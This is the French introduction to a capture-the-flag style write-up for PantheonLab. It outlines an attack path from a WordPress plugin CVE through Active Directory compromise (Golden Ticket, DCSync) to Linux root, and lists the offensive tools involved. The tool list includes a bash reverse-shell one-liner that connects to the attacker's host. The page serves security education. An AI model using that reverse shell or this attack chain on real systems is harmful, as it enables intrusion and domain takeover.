Skip to content

Introduction au Writeup

⚠️ Avertissement - Copier n'est pas apprendre

Ce writeup est fourni à des fins éducatives uniquement !

🎯 Recommandation forte : Essayez d'abord de résoudre le lab par vous-même avant de consulter cette solution.

📚 Pourquoi ? - Les vraies compétences se développent en cherchant, en échouant, et en recommençant - Copier-coller ne vous apprendra rien de durable - La satisfaction de résoudre un défi par soi-même est incomparable - En cybersécurité, l'adaptabilité est plus importante que la mémorisation

🏆 Rappelez-vous : Il n'y a aucune récompense à la fin de ce lab, si ce n'est les compétences et connaissances que vous aurez acquises. Autant que ce soit par votre propre effort !

💡 Utilisez ce writeup comme : - Une validation de votre approche après avoir trouvé - Une aide quand vous êtes vraiment bloqué (évitez cette page car elle résume beaucoup de choses simultanément.) - Une source d'apprentissage pour comprendre les techniques

🎯 Objectif du Lab

Ce writeup détaille la résolution complète du lab PantheonLab, un environnement de pentest inspiré de la mythologie grecque. L'objectif est de démontrer une méthodologie complète d'audit de sécurité, de l'énumération initiale jusqu'à l'obtention des privilèges administrateur sur toutes les machines.

🏛️ Contexte du Scénario

Dans l'univers de PantheonLab, les dieux de l'Olympe ont décidé de mettre en place des jeux afin de permettre à un mortel de se hisser au-dessus des autres et de les rejoindre au Panthéon. Cependant, un dieu, Hermès, s'agace dans l'ombre de n'être que le messager. Il a introduit des vulnérabilités pour s'approcher discrètement des dieux — des vulnérabilités que vous devrez identifier et exploiter, vous devrez ensuite vous débrouiller afin de compromettre entièrement cet environnement.

Machines Cibles

Machine IP Rôle
Olympe 192.168.56.10 Serveur Linux/WordPress
DC01 192.168.56.11 Contrôleur de domaine
Enfers 192.168.56.12 Serveur membre

🔍 Méthodologie d'Attaque

Phase 1 : Reconnaissance

  • Énumération réseau : Découverte des machines et services
  • Énumération web : Analyse du site WordPress
  • Recherche de vulnérabilités : Identification des vecteurs d'attaque

Phase 2 : Exploitation Initiale

  • Exploitation WordPress : Exploitation de CVE
  • Obtenir un shell : Accès initial sur Olympe
  • Élévation de privilèges : Accès à utilisateur hermes

Phase 3 : Lateral Movement

  • Énumération Active Directory : Découverte du domaine
  • Exploitation des credentials : Utilisation des comptes trouvés
  • Accès aux machines Windows : Pivot vers DC01

Phase 4 : Compromision du domaine

  • Escalade de privilèges : Obtenir l'accès administrateur
  • Accès aux machines Windows : Pivot vers ENFERS
  • Golden Ticket : Contrôle total du domaine
  • DCSync : Extraction des hashes du domaine

Phase 5 : Escalade de privilège linux

  • Password Reused : Connexion en tant que hera sur la machine linux
  • Exploitation : Insecure cron jobs
  • Escalade de privilèges : Obtenir l'accès root

🛠️ Outils Utilisés

Énumération

# Réseau
nmap 
netexec||nxc

# Web
wpscan 
gobuster

# Active Directory
netexec||nxc
rusthound
bloodhound

Exploitation

# WordPress
CVE-2025-32118.py

# Reverse Shell
bash -c 'bash -i >& /dev/tcp/192.168.56.1/9001 0>&1'

# Active Directory
mimikatz.exe
rubeus.exe
SharpSuccessor.exe
GMSAPasswordReader.exe

📊 Progression Attendue

Niveau 1 : Accès Initial

  • Énumération du réseau
  • Découverte du site WordPress
  • Identification de la vulnérabilité CMP Coming Soon
  • Exploitation et obtention d'un shell

Niveau 2 : Élévation de Privilèges

  • Accès utilisateur hermes
  • Découverte des credentials SMB
  • Accès au domaine Active Directory

Niveau 3 : Lateral Movement

  • Énumération complète du domaine
  • Découverte des utilisateurs et groupes
  • Exploitation des vulnérabilités Kerberos

Niveau 4 : Contrôle Total

  • Escalade vers administrateur
  • Création de Golden Ticket
  • DCSync du domaine
  • Privesc Linux

⚠️ Avertissements Importants

Environnement Contrôlé

Ce lab est conçu pour l'apprentissage dans un environnement isolé. Ne jamais tester ces techniques sur des systèmes de production sans autorisation.

Légalité

L'utilisation de ces techniques doit toujours respecter les lois locales et les autorisations appropriées.

Bonnes Pratiques

Documentez chaque étape, prenez des captures d'écran, et comprenez le "pourquoi" derrière chaque technique.

🎯 Objectifs d'Apprentissage

Compétences Techniques

  • Énumération web avancée : WordPress, plugins, vulnérabilités
  • Exploitation Active Directory : Kerberos, DCSync, Golden Ticket
  • Lateral movement : Pivot entre machines
  • Privilege escalation : Windows et Linux

Compétences Méthodologiques

  • Approche structurée : Méthodologie de pentest
  • Documentation : Writeup professionnel
  • Résolution de problèmes : Debugging et troubleshooting
  • Pensée critique : Analyse des vulnérabilités

📚 Ressources Complémentaires

Documentation Technique


Que la sagesse d'Athéna vous guide ! ⚡🏛️